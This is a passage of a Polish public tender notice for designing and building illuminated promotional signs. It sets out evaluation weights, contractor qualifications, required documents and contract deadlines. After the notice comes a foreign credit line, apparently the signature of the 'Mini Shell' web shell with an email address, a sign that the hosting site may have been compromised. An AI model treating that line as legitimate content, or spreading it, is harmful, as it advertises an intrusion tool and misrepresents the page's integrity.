pkt;<br/>49 – 54 miesięcy – 15 pkt;<br/>55 – 60 miesięcy i więcej – 20 pkt;<br/>Termin gwarancji należy podać w miesiącach.<br/>Zamawiający odrzuci oferty, które będą zakładały gwarancję krótszą niż 36 miesięcy lub nie będą<br/>zwierały informacji dot. udzielonej gwarancji.<br/>W przypadku, gdy Wykonawca określi okres gwarancji dłuższy niż 60 miesięcy to Zamawiający do<br/>obliczeń będzie przyjmował okres wynoszący 60 miesięcy, natomiast umowa zostanie zawarta z<br/>uwzględnieniem długości okresu gwarancji zadeklarowanego w ofercie.<br/>W przypadku, gdy Wykonawca zadeklaruje termin gwarancji wyrażony inną wartością niż pełne<br/>miesiące, Zamawiający dokona zaokrąglenia „w dół”, natomiast umowa zostanie zawarta z<br/>uwzględnieniem deklaracji zawartej w ofercie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność techniczna lub zawodowa<br/>I. Wykonawca musi wykazać, że nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,<br/>wykonał należycie w formule zaprojektuj i wybuduj: co najmniej dwa podświetlone napisy<br/>promocyjno – reklamowe o wartości min. 30 000,00 zł brutto każdy, z potwierdzeniem ich<br/>należytego wykonania.<br/>Uwaga: Mając na uwadze art. 117 ust. 1 ustawy Zamawiający zastrzega, że w sytuacji składania<br/>oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz analogicznie<br/>w sytuacji, gdy Wykonawca będzie polegał na zasobach innego podmiotu, na zasadach<br/>określonych w art. 118 ustawy, warunek o którym wyżej mowa, musi zostać spełniony w całości<br/>przez Wykonawcę (jednego z Wykonawców wspólnie składającego ofertę) lub podmiot, na<br/>którego zdolności w tym zakresie powołuje się Wykonawca – brak możliwości tzw. sumowania<br/>zasobów w zakresie doświadczenia.<br/>Do przeliczenia wszystkich wartości finansowych, a występujących w innych walutach niż PLN<br/>Wykonawca zastosuje średni kurs Narodowego Banku Polskiego (NBP) opublikowany w dniu<br/>ukazania się ogłoszenia o niniejszym zamówieniu na stronie internetowej Zamawiającego.<br/>Średnie kursy walut dostępne są na stronie internetowej Narodowego Banku Polskiego pod<br/>następującym adresem: http://www.nbp.pl/.<br/>II. Wykonawca wskaże osoby do wykonania niniejszego zamówienia wraz z informacjami na<br/>temat ich wykształcenia, kwalifikacji zawodowych, doświadczenia, a także zakresu<br/>wykonywanych przez nią czynności, która spełnia następujące warunki:<br/>1) jedna osoba, która będzie pełniła funkcję Projektanta branży elektrycznej, posiadająca<br/>uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie, tj.:<br/>projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i<br/>elektroenergetycznych;<br/>2) jedna osoba, która będzie pełniła funkcję Kierownika budowy, posiadająca uprawnienia do<br/>sprawowania samodzielnych funkcji technicznych w budownictwie tj.: do kierowania robotami<br/>budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i<br/>elektroenergetycznych.<br/>Zamawiający dopuszcza możliwość łączenia ww. funkcji, pod warunkiem posiadania przez jedną<br/>osobę wymaganych uprawnień budowlanych.<br/>Wskazane wyżej uprawnienia budowlane powinny być wydane na podstawie:<br/>- Rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019r. w sprawie<br/>przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w<br/>budownictwie (Dz. U. z 2019r. poz. 831), lub<br/>- odpowiadające im ważne uprawnienia w zakresie odpowiadającym powyższym wymaganiom,<br/>wydane na podstawie wcześniej obowiązujących przepisów.<br/>Ilekroć powyżej mowa jest o uprawnieniach, to w przypadku osób będących obywatelami krajów<br/>członkowskich Unii Europejskich oznacza to decyzję w sprawie uznania wymaganych<br/>kwalifikacji do wykonywania w Rzeczypospolitej Polskiej samodzielnych funkcji technicznych w<br/>budownictwie w zakresie przedmiotu niniejszego zamówienia – zgodnie z właściwymi<br/>przepisami, w szczególności: z ustawą o zasadach uznania kwalifikacji zawodowych nabytych w<br/>krajach członkowskich Unii Europejskiej z dnia 22 grudnia 2015r. (tekst jednolity Dz. U. z 2020r.,<br/>poz. 220 z późn. zm.) oraz Ustawą z dnia 15 grudnia 2000r. o samorządach zawodowych<br/>architektów, inżynierów budownictwa (tekst jednolity Dz. U. z 2019r., poz. 1117 z późn. zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących<br/>podmiotowych środków dowodowych W zakresie potwierdzenia warunków udziału w postępowaniu:<br/>1) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami– w zakresie niezbędnym do<br/>wykazania spełnienia warunku udziału w postępowaniu (wzór stanowi załącznik nr 5 do SWZ);<br/>2) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i<br/>miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem<br/>dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów - inne odpowiednie dokumenty – w zakresie niezbędnym do<br/>wykazania spełnienia warunku udziału w postępowaniu (wzór stanowi załącznik nr 6 do SWZ);</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Do oferty należy złożyć:<br/>1) Formularz ofertowy sporządzony zgodnie ze wzorem stanowiącym załącznik nr 1 do SWZ,<br/>2) Oświadczenie o niepodleganiu wykluczeniu oraz spełnieniu warunków udziału w<br/>postępowaniu na podstawie art. 125 ust. 1, (wzór oświadczenia stanowi załącznik nr 2 do SWZ)<br/>Oświadczenie składają odrębnie: a) wykonawca/każdy spośród wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.b) podmiot udostępniający zasoby, na którego<br/>potencjał powołuje się Wykonawca celem potwierdzenia spełnienia warunków udziału w<br/>postępowaniu.<br/>3) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej lub innego właściwego rejestru potwierdzającego, że osoba<br/>działająca w imieniu wykonawcy jest umocowana do jego reprezentowania.<br/>4) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania<br/>Wykonawcy, gdy umocowanie osoby składającej ofertę nie wynika z dokumentów opisanych w<br/>pkt 3).<br/>5) w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) pełnomocnictwo, w przypadku wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, z treści którego będzie wynikało umocowanie do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego.<br/>b) oświadczenie, o którym mowa w pkt 7.4 SWZ (Zamawiający dopuszcza złożenia tego<br/>oświadczenia na formularzu ofertowym);<br/>6) zobowiązanie podmiotu udostępniającego zasoby do oddania lub inny podmiotowy środek<br/>dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował<br/>niezbędnymi zasobami podmiotów (jeżeli dotyczy)<br/>7) dowód wniesienia wadium,<br/>2. Wykonawca nie jest zobowiązany do złożenia dokumentu rejestrowego, o których mowa w<br/>ppkt 3) , jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz<br/>danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>3. Zapisy ppkt 4) stosuje się odpowiednio do osoby działającej w imieniu wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.<br/>4. Zapisy ppkt 3), 4) i pkt 2 stosuje się odpowiednio do osoby działającej w imieniu podmiotu<br/>udostępniającego zasoby na zasadach określonych w art. 118 ustawy Pzp lub podwykonawcy<br/>niebędącego podmiotem udostępniającym zasoby na takich zasadach. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia:<br/>1 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają Pełnomocnika do<br/>reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i<br/>zawarcia Umowy. Umocowanie musi wynikać z treści pełnomocnictwa przedłożonego wraz z<br/>ofertą.<br/>2 Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej (o ile został sformułowany), o którym mowa w art. 112 ust. 2 pkt 2 ustawy Pzp,<br/>zostanie spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności<br/>gospodarczej lub zawodowej i zrealizuje roboty, dostawy lub usługi do których realizacji te<br/>uprawnienia są wymagane.<br/>3 W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia (o ile zostały sformułowane) wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty<br/>budowlane lub usługi do realizacji których te zdolności są wymagane.<br/>4 W przypadku, o którym mowa w pkt 2 i 3, wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, które usługi,<br/>roboty wykonają poszczególni wykonawcy.<br/>5 Pełnomocnictwo powinno jednoznacznie określać postępowanie, do którego się odnosi i<br/>precyzować zakres umocowania. Zaleca się, aby Pełnomocnikiem był jeden z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia. Wszelka korespondencja będzie<br/>prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/>6 Oświadczenie o niepodleganiu wykluczeniu, spełnieniu warunków udziału w postępowaniu (art.<br/>125 ust. 1) składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>Dokument ten potwierdza spełnienie warunków udziału w postępowaniu oraz brak podstaw do<br/>wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnienie warunków udziału<br/>w postępowaniu oraz brak podstaw do wykluczenia.<br/>7 Każdy z Wykonawców wspólnie ubiegających się udzielenie zamówienia musi wykazać, że nie<br/>podlega wykluczeniu z postępowania, dlatego dokumenty i oświadczenia składane na<br/>potwierdzenie braku podstaw do wykluczenia składają każdy z Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia (jeżeli dotyczy).<br/>8 W przypadku wykonawców wspólnie ubiegających się o zamówienie, których oferta zostanie<br/>uznana za najkorzystniejszą, przed podpisaniem umowy o realizację zamówienia, są<br/>zobowiązani do zawarcia umowy cywilnoprawnej określającą rolę i zadania poszczególnych<br/>Wykonawców oraz zasady ich współdziałania podczas realizacji zamówienia. Zamawiający<br/>może żądać przedstawienia wyżej wskazanej umowy.<br/>9 Wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność za<br/>wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia:Zamawiający przewiduje<br/>możliwość zmian postanowień umowy na podstawie art. 455 ust.1 ustawy Pzp. Szczegółowe<br/>zasady wprowadzania zmian określone zostały w PPU. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-04 12:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy złożyć w formie elektronicznej za pośrednictwem Platformy, działającej pod adresem https://epropublico. pl/Zamawiajacy/AktualneOgloszenia?zamawiajacyId=f15dda4c-01df-4c59-b90fa767d9826443</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-04 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-03</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1 Zamówienie (opracowania i czynności oraz roboty budowlane) należy zrealizować w terminie<br/>nie dłuższym niż 210 dni kalendarzowych, jednak nie krócej niż 180 dni kalendarzowych<br/>liczonych od daty zawarcia umowy (wartość oceniana).<br/>2 Terminy wykonania opracowań składających się na przedmiot umowy (planowane terminy<br/>cząstkowe):<br/>1) Wykonanie dokumentacji geodezyjnej i przekazanie jej Zamawiającemu odpowiednio<br/>skompletowanej w wersji papierowej i elektronicznej – do odbioru<br/>- w czasie nie dłuższym niż zastrzeżony na wykonanie dokumentacji projektowej, (jak w pkt. 2);<br/>2) przekazanie Zamawiającemu kompletnej i pozytywnie uzgodnionej dokumentacji projektowej<br/>wraz z kompletem wymaganych przepisami prawa uzgodnień, sprawdzeń, opinii, pozwoleń czy<br/>decyzji i przekazanie ich Zamawiającemu– do sprawdzenia<br/>- w czasie nie dłuższym niż 60 dni kalendarzowe od dnia podpisania umowy;<br/>3) wprowadzenie uwag, poprawek oraz usunięcie wad w ww. opracowaniach oraz przekazanie<br/>Zamawiającemu tych wolnych od usterek i wad elementów dokumentacji – do ostatecznego<br/>zaakceptowania<br/>- w czasie nie dłuższym niż 7 dni kalendarzowych od dnia otrzymania uwag od Zamawiającego;<br/>4) złożenie kompletnego wniosku o wydanie pozwolenia na budowę, a dodatkowo – jego kopii u<br/>Zamawiającego z potwierdzeniem jego złożenia w Starostwie Powiatowym:<br/>- w czasie nie dłuższym niż 7 dni od dnia otrzymania od Zamawiającego ostatecznej akceptacji<br/>dokumentacji projektowej;<br/>5) przekazanie Zamawiającemu odpowiednio skompletowanych ww. opracowań w wersji<br/>papierowej i elektronicznej<br/>- w czasie nie dłuższym niż 7 dni kalendarzowych od dnia otrzymania od Zamawiającego<br/>ostatecznej akceptacji.<br/>6) uzyskanie decyzji pozwolenia na budowę i przekazanie go Zamawiającemu wraz z<br/>opieczętowanymi załącznikami - w czasie nie dłuższym niż 56 dni od dnia złożenia wniosku o ich wydanie;<br/>7) uzyskanie ostatecznej decyzji pozwolenia na budowę i przekazanie je Zamawiającemu<br/>- w czasie nie dłuższym niż 14 dni od dnia wydania decyzji o pozwoleniu na budowę,<br/>8) przekazanie Zamawiającemu ostatecznej decyzji pozwolenia na budowę<br/>- w czasie nie dłuższym niż 3 dni od jej uprawomocnienia się.<br/>3 Zamawiający jest zobowiązany do sprawdzenia jakości przedmiotu zamówienia, w tym do<br/>zaakceptowania, uzgodnienia lub zajęcia stanowiska w sprawie przekazanych opracowań:<br/>- w czasie nie dłuższym niż 7 dni kalendarzowych od dnia otrzymania ich od Wykonawcy do<br/>uzgodnienia lub sprawdzenia.<br/>4 Zamawiający dokona ponownego sprawdzenia ww. opracowań po wprowadzeniu poprawek<br/>przez Wykonawcę.<br/>- w terminie 7 dni kalendarzowych od dnia otrzymania ich od Wykonawcy.<br/>5 Zamawiający przekaże Wykonawcy plac budowy w terminie obustronnie uzgodnionym, lecz<br/>nie później niż 14 dni po uprawomocnieniu się decyzji pozwolenia na budowę.<br/>6 Za datę wykonania przez Wykonawcę opracowań składających się na przedmiot umowy<br/>przyjmuje się datę przekazania Zamawiającemu tych opracowań.<br/>7 Za datę ostatecznego odbioru przez Zamawiającego opracowań składających się na<br/>przedmiot umowy przyjmuje się datę przekazania Zamawiającemu ostatecznej decyzji<br/>pozwolenia na budowę.<br/>8 Za datę wykonania robót budowlano-montażowych uważa się datę zawiadomienia<br/>Zamawiającego przez Wykonawcę o zakończeniu robót.<br/>9 Za datę zakończenia przedmiotu umowy przyjmuje się datę podpisania przez Strony protokołu<br/>odbioru końcowego.<br/>10 Wyznaczony czas 7 dni kalendarzowych dla Wykonawcy na poprawienie, uzupełnienie<br/>przedmiotu zamówienia na poszczególnym etapie jego odbioru jest czasem danym mu<br/>jednorazowo na te czynności.<br/>11 Okres gwarancji wynosi min. 36 miesięcy, jednak nie dłużej niż 60 miesięcy licząc od dnia<br/>protokołu odbioru końcowego (wartość oceniana).<br/>12 Okres rękojmi za wady wynosi 5 lat licząc od dnia wykonania zamówienia i uznania przez<br/>zamawiającego za należycie wykonane (protokół odbioru końcowego).

Creat By MiNi SheLL
Email: jattceo@gmail.com